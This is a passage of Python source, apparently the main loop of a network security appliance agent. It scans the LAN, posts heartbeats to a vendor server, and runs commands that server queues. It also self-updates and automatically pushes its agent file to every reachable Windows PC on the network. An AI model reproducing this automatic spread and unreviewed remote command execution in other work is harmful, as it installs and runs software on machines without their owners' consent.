        st = load_state()
        agents = dict(st.get("companion_agents") or {})
    target = str(payload.get("agent_id") or "").strip()
    cmd = {
        "id": f"{kind}-{int(time.time())}",
        "type": kind,
        "queued_at": time.time(),
        "url": str(payload.get("url") or ""),
    }
    queued = 0
    for aid, row in list(agents.items()):
        if not isinstance(row, dict):
            continue
        if target and aid != target:
            continue
        cmds = list(row.get("pending_commands") or [])
        cmds.append(cmd)
        row["pending_commands"] = cmds[-8:]
        agents[aid] = row
        queued += 1
    try:
        import companion_store as cs

        cs.save_agents(agents)
    except Exception:
        st = load_state()
        st["companion_agents"] = agents
        save_state(st)
    return queued


def _launch_local_tool(kind: str, payload: dict) -> dict:
    """Open Chrome / Winbox on the box's virtual display (:1) so the owner can
    see them through the noVNC remote desktop — never on customer PCs."""
    env = dict(os.environ)
    env["DISPLAY"] = os.environ.get("DISPLAY") or ":1"
    env.setdefault("WINEPREFIX", "/var/lib/atlas-cyber-protect/wine")
    env.setdefault("WINEDLLOVERRIDES", "mscoree,mshtml=")
    url = str(payload.get("url") or "https://www.speedtest.net/").strip()
    try:
        if kind == "open_browser":
            for exe, args in (
                ("google-chrome-stable", ["--no-sandbox", "--disable-gpu", "--disable-dev-shm-usage"]),
                ("google-chrome", []),
                ("chromium-browser", []),
                ("chromium", []),
                ("firefox", []),
                ("xdg-open", []),
            ):
                if subprocess.call(["which", exe], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0:
                    subprocess.Popen([exe, *args, url], env=env, start_new_session=True)
                    return {"ok": True, "via": exe, "url": url, "display": env["DISPLAY"]}
            return {"ok": False, "error": "no browser on Protect box (run install-desktop-tools.sh)"}
        winbox = Path("/opt/atlas-cyber-protect/winbox/winbox64.exe")
        if not winbox.is_file():
            winbox = Path.home() / ".local/share/atlas-cyber-protect/winbox64.exe"
            winbox.parent.mkdir(parents=True, exist_ok=True)
            if not winbox.is_file():
                try:
                    urllib.request.urlretrieve(
                        "https://download.mikrotik.com/routeros/winbox/3.41/winbox64.exe",
                        str(winbox),
                    )
                except Exception as exc:
                    return {"ok": False, "error": f"winbox download failed: {exc}"[:160]}
        for exe in ("wine", "wine64"):
            if subprocess.call(["which", exe], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0:
                subprocess.Popen([exe, str(winbox)], env=env, start_new_session=True)
                return {"ok": True, "via": exe, "display": env["DISPLAY"]}
        return {"ok": False, "error": "Winbox needs Wine on the Linux Protect box (run install-desktop-tools.sh)"}
    except Exception as exc:
        return {"ok": False, "error": str(exc)[:160]}


def _open_site_tool(kind: str, cmd: dict) -> dict:
    payload = {
        "url": str(cmd.get("url") or ""),
        "agent_id": str(cmd.get("agent_id") or "").strip(),
    }
    queued = _queue_companion_tool(kind, payload)
    local = _launch_local_tool(kind, payload)
    return {
        "ok": True if queued or local.get("ok") else False,
        "kind": kind,
        "queued_pcs": queued,
        "local": local,
        "note": (
            f"Queued on {queued} Windows agent(s). "
            + ("Local launch ok." if local.get("ok") else str(local.get("error") or ""))
        )[:240],
    }


def main() -> None:
    if not TOKEN:
        print("ENROLL_TOKEN missing", flush=True)
        time.sleep(30)
        return
    st = load_state()
    print("Atlas Cyber Protect agent starting (rich LAN scan)", flush=True)
    # Boot-time update check: pull the latest portal/agent firmware from Atlas
    # right away, so a box that was off for a while (or just rebooted remotely)
    # is on the newest build before it serves the customer. maybe_update_portal
    # itself is throttled, but forcing it here guarantees a check on every boot.
    try:
        maybe_update_portal(st)
        save_state(st)
    except Exception as boot_exc:
        print(f"boot update check: {boot_exc}", flush=True)
    while True:
        try:
            # Reload state fresh each iteration: the portal writes pairing,
            # console queue/results and activity at any time. Keeping one
            # in-memory copy re-writes stale data (e.g. consumed console
            # tasks came back forever) and hides agents paired later.
            st = load_state()
            devices = discover_devices(st)
            track_device_churn(st, devices)
            for d in devices:
                mac = d.get("mac") or ""
                if mac and mac not in st["seen_macs"]:
                    st["seen_macs"][mac] = time.time()
                    label = d.get("hostname") or d.get("vendor") or d.get("ip") or mac
                    ping_s = (
                        f", ping {d.get('ping_ms')} ms"
                        if isinstance(d.get("ping_ms"), (int, float))
                        else ""
                    )
                    act = list(st.get("activity") or [])
                    act.insert(
                        0,
                        {
                            "ts": time.time(),
                            "plain": f"New device on your network: {label}{ping_s}. Not blocked.",
                        },
                    )
                    st["activity"] = act[:40]
            pct = learning_pct(st)
            st["learning_pct"] = pct
            state_name = "stable" if pct >= 100 else "learning"
            health = probe_network_health()
            internet_ok = bool(health.get("internet_ok"))
            st["internet_ok"] = internet_ok
            st["network_health"] = health
            st["services_summary"] = services_summary(devices)
            try:
                from threat_hunter import probe_inbound

                sm = st.get("scan_meta") or {}
                probe_inbound(st, str(sm.get("iface") or "eth0"), str(sm.get("self_ip") or lan_ip()))
            except Exception as pexc:
                print(f"inbound_probe: {pexc}", flush=True)
            # Apply customer decisions so Fine/Neutralize stick in the UI
            st.setdefault("decisions", {})
            decisions = drain_decisions()
            for dec in decisions:
                key = str(dec.get("key") or "").strip()
                if key:
                    st["decisions"][key] = {
                        "decision": dec.get("decision"),
                        "ts": time.time(),
                        "email": dec.get("email"),
                    }
            # Also honor the durable decisions table so findings the customer
            # already marked fine/neutralize never come back (this box shares
            # the portal.sqlite DB with the portal server).
            try:
                import sqlite3 as _sqlite3

                _dbcon = _sqlite3.connect(
                    str(DATA / "portal.sqlite"), timeout=15
                )
                _dbcon.row_factory = _sqlite3.Row
                for row in _dbcon.execute(
                    "SELECT finding_key, decision FROM decisions"
                ):
                    _k = str(row["finding_key"] or "").strip()
                    if _k:
                        st["decisions"].setdefault(
                            _k, {"decision": str(row["decision"] or ""), "ts": time.time()}
                        )
                _dbcon.close()
            except Exception as _dbexc:
                print(f"decisions db merge: {_dbexc}", flush=True)
            findings = findings_from_scan(devices, internet_ok, st.get("decisions") or {}, st)
            st["open_findings"] = findings
            st["last_devices"] = devices
            st["device_count"] = len(devices)
            st["capabilities"] = build_capabilities(st)
            # Living UI guardian (narration only — never blocks)
            try:
                from ui_guardian import refresh_living_state

                refresh_living_state(st)
            except Exception as gexc:
                print(f"guardian: {gexc}", flush=True)
            reachable = sum(1 for d in devices if d.get("reachable"))
            top = sorted(devices, key=lambda x: int(x.get("bytes_obs") or 0), reverse=True)[:3]
            top_label = ", ".join(
                f"{(t.get('hostname') or t.get('ip') or t.get('mac'))} {t.get('traffic_share_pct') or 0}%"
                for t in top
                if int(t.get("bytes_obs") or 0) > 0
            ) or "sampling…"
            pulse = (st.get("guardian_pulse") or {}).get("score")
            dns_ok = bool((health.get("dns") or {}).get("ok"))
            inet_ms = next(
                (t.get("avg_ms") for t in (health.get("targets") or []) if t.get("avg_ms") is not None),
                None,
            )
            st["jobs"] = [
                {"id": "learn", "label": "Learning normal traffic", "pct": pct},
                {
                    "id": "scan",
                    "label": f"Scanning LAN · {len(devices)} devices · {reachable} answering",
                    "pct": min(100.0, pct + 8),
                },
                {
                    "id": "traffic",
                    "label": f"Watching bandwidth · top: {top_label}",
                    "pct": min(100.0, 40 + min(60, len(devices) * 2)),
                },
                {
                    "id": "internet",
                    "label": (
                        f"Internet path · {inet_ms} ms · DNS {'OK' if dns_ok else 'check'}"
                        if inet_ms is not None
                        else f"Internet path · {'OK' if internet_ok else 'DOWN'}"
                    ),
                    "pct": 100.0 if internet_ok and dns_ok else (40.0 if internet_ok else 10.0),
                },
                {
                    "id": "guardian",
                    "label": f"Guardian agent live · pulse {pulse if pulse is not None else '—'}/100",
                    "pct": 100.0 if pulse else 70.0,
                },
            ]
            if findings:
                st["jobs"].append(
                    {
                        "id": "inspect",
                        "label": "Threats need your Fine / Neutralize decision",
                        "pct": 60.0,
                    }
                )
            # Insert threat job near the top of the live process list
            ts = st.get("threat_summary") or {}
            st["jobs"].insert(
                2,
                {
                    "id": "threats",
                    "label": (
                        f"Threat scan · {ts.get('findings', 0)} open · "
                        f"{ts.get('critical', 0)} critical · {ts.get('high', 0)} high"
                    ),
                    "pct": 100.0 if ts.get("checked_at") else 35.0,
                },
            )
            events = []
            if not internet_ok:
                events.append(
                    {
                        "kind": "internet_down",
                        "severity": "warn",
                        "plain_message": "Internet looks down from the Cyber Protect box.",
                    }
                )
            for dec in decisions:
                events.append(
                    {
                        "kind": "customer_decision",
                        "severity": "info",
                        "plain_message": f"Customer chose {dec.get('decision')} on {dec.get('key')}",
                        "detail": dec,
                    }
                )
                if dec.get("decision") == "neutralize":
                    key = str(dec.get("key") or "")
                    mac = ""
                    if key.startswith("bandwidth:"):
                        mac = key.split("bandwidth:", 1)[-1]
                    elif key.startswith("riskport:"):
                        # riskport:PORT:aa:bb:cc:dd:ee:ff
                        mac = key.split(":", 2)[-1] if key.count(":") >= 7 else ""
                    elif key.startswith("newdevice:"):
                        mac = key.split("newdevice:", 1)[-1]
                    elif key.startswith("mac:"):
                        mac = key.split("mac:", 1)[-1]
                    elif "mac" in (dec.get("detail") or {}):
                        mac = str((dec.get("detail") or {}).get("mac") or "")
                    # Also pull from open findings
                    if not mac:
                        for f in findings:
                            if f.get("key") == key and f.get("mac"):
                                mac = str(f.get("mac"))
                                break
                    if mac:
                        apply_blocked_macs([mac])
                        act = list(st.get("activity") or [])
                        act.insert(
                            0,
                            {
                                "ts": time.time(),
                                "plain": (
                                    f"Neutralized MAC {mac} on Protect path (side-box filter). "
                                    "For full LAN block, also remove/block it on your router/AP."
                                ),
                            },
                        )
                        st["activity"] = act[:40]
            # Slim devices for wire (keep stats)
            wire_devices = []
            for d in devices:
                wire_devices.append(
                    {
                        "ip": d.get("ip") or "",
                        "mac": d.get("mac") or "",
                        "hostname": d.get("hostname") or "",
                        "vendor": d.get("vendor") or "",
                        "ping_ms": d.get("ping_ms"),
                        "ping_min_ms": d.get("ping_min_ms"),
                        "ping_max_ms": d.get("ping_max_ms"),
                        "loss_pct": d.get("loss_pct"),
                        "reachable": d.get("reachable"),
                        "timeouts": d.get("timeouts"),
                        "timeout_streak": d.get("timeout_streak"),
                        "last_timeout_at": d.get("last_timeout_at") or "",
                        "bytes_obs": d.get("bytes_obs") or 0,
                        "bytes_rate": d.get("bytes_rate") or 0,
                        "bytes_total": d.get("bytes_total") or 0,
                        "traffic_share_pct": d.get("traffic_share_pct") or 0,
                        "open_ports": d.get("open_ports") or "",
                        "device_type": d.get("device_type") or "",
                        "role_guess": d.get("role_guess") or "",
                        "icon_key": d.get("icon_key") or "unknown",
                        "display_name": d.get("display_name") or "",
                        "product_hint": d.get("product_hint") or "",
                        "stats": d.get("stats") or {},
                    }
                )
            try:
                hb = post_json(
                "/api/cyber-protect/heartbeat",
                {
                    "enroll_token": TOKEN,
                    "lan_ip": lan_ip(),
                    "tailscale_ip": tailscale_ip(),
                    "learning_pct": pct,
                    "learning_state": state_name,
                    "internet_ok": internet_ok,
                    "devices": wire_devices,
                    "events": events,
                    "findings": findings,
                    "snapshot": {
                        "scan_meta": st.get("scan_meta") or {},
                        "guardian_pulse": st.get("guardian_pulse") or {},
                        "network_health": st.get("network_health") or {},
                        "services_summary": st.get("services_summary") or [],
                    },
                    "command_acks": st.pop("_acks", []),
                },
            )
            except urllib.error.HTTPError as _herr:
                _body = ""
                try:
                    _body = _herr.read().decode("utf-8", errors="replace")
                except Exception:
                    pass
                if _herr.code == 404 and "invalid enroll token" in _body:
                    # Guard deleted our site — come back as Needs setup so it
                    # reappears in the Guard room and can be claimed again.
                    if re_register_unclaimed():
                        print("re-registered as Needs setup — claim it in Guard", flush=True)
                        time.sleep(INTERVAL)
                        continue
                raise
            apply_gateway_failover(st, hb.get("gateway_ips") or [])
            apply_blocked_macs(hb.get("blocked_macs") or [])
            locked = bool(hb.get("locked"))
            st["subscription_locked"] = locked
            set_locked(locked, str(hb.get("lock_message") or "Subscription paused"))
            # Persist Factory customer brand onto this box so portal shows Protected by Atlas + company
            try:
                cust = {
                    "business_name": str(hb.get("business_name") or "").strip(),
                    "site_name": str(hb.get("site_name") or "").strip(),
                    "notify_email": str(hb.get("notify_email") or "").strip(),
                    "company_id": str(hb.get("company_id") or "").strip(),
                    "site_id": str(hb.get("site_id") or "").strip(),
                    "updated_at": time.time(),
                }
                if cust["business_name"] or cust["site_name"] or cust["company_id"]:
                    (DATA / "customer.json").write_text(
                        json.dumps(cust, indent=2), encoding="utf-8"
                    )
                    st["customer"] = cust
            except Exception as cexc:
                print(f"customer persist: {cexc}", flush=True)
            acks = []
            for cmd in hb.get("commands") or []:
                acks.append({"id": cmd.get("id"), **run_command(cmd)})
            if acks:
                st["_acks"] = acks
            try:
                pending_people = hb.get("pending_people") if isinstance(hb.get("pending_people"), list) else []
                (DATA / "lan-pending.json").write_text(
                    json.dumps(
                        {"updated": time.time(), "people": pending_people[:50]},
                        indent=2,
                    ),
                    encoding="utf-8",
                )
                st["pending_people"] = pending_people[:50]
            except Exception:
                pass
            # Portal UI self-update from Atlas — new fixes reach this box automatically.
            # Check at most every 10 min unless forced (portal button / ui_update command).
            forced = bool(st.pop("portal_update_requested", None))
            last_check = float((st.get("portal_update_info") or {}).get("checked_at") or 0)
            if forced or time.time() - last_check > 600:
                try:
                    maybe_update_portal(st)
                except Exception as uexc:
                    print(f"portal update loop: {uexc}", flush=True)
            # Mirror newest Windows agent release from Atlas so on-site PCs
            # auto-update without manual SSH (checks every heartbeat, cheap).
            try:
                mirror_agent_release()
            except Exception as m_exc:
                print(f"agent mirror loop: {m_exc}", flush=True)
            # Auto-seed the agent into C:\Users\Public on every reachable Windows
            # PC (fresh box install → whole office network gets the agent file).
            try:
                push_agent_to_public(st, devices)
            except Exception as p_exc:
                print(f"agent push loop: {p_exc}", flush=True)
            # Atlas Remote Console relay: pull queued commands from Atlas for our
            # agents and forward their results back up (enroll_token auth).
            try:
                relay_console(st)
            except Exception as c_exc:
                print(f"console relay loop: {c_exc}", flush=True)
            save_state(st)
            print(
                f"heartbeat ok learn={pct}% devices={len(devices)} reachable={reachable} "
                f"locked={locked} inet={internet_ok} cidr={(st.get('scan_meta') or {}).get('cidr')}",
                flush=True,
            )
            # Mirror the company chat archive onto this box (messages, media, calls)
            try:
                sync_chat_archive()
            except Exception as arc_exc:
                print(f"chat archive: {arc_exc}", flush=True)
        except Exception as exc:
            print(f"agent error: {exc}", flush=True)
        time.sleep(INTERVAL)


if __name__ == "__main__":
    main()
